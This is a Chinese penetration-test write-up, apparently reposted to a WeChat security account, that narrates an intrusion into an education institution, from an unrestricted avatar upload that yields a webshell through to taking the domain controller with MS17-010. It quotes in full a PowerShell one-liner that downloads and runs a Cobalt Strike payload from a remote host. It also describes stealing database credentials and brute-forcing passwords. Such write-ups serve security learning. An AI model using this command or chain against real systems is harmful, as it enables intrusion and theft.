这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
正文
目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
进行了简单的信息搜集
子域名搜集
fofa找资产
一共七个资产。去重之后只有两个。
目录探测
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
我又尝试了通过修改返回包来绕过登录界面
还是不行,尝试注入无果
不过我目录探测出了一处Spring信息泄露
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
获取有些师傅到这一步就手机抓包电脑测了。
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
其中在一个公众号发现了小程序,可以进行注册。
看到了头像上传,尝试上传获取WebShell
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
然后上了大马
通过翻找文件发现数据库账号密码
--内网渗透
直接通过powershell执行 cs上线
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
小结
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
作者:Xm4FDf
转载自:https:
//bbs.ichunqiu.com/thread-57879-1-1.html
声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果
原文始发于微信公众号(渗透安全团队):渗透实战 | 从外网直接打到内网全过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论